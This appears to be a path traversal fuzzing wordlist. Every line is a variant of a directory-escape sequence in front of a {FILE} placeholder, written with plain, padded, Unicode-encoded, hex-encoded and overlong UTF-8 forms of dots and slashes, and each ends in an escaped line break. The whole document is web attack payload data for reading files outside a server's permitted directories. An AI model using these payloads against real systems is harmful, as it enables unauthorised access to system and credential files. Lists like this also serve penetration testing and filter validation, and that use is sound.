AAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
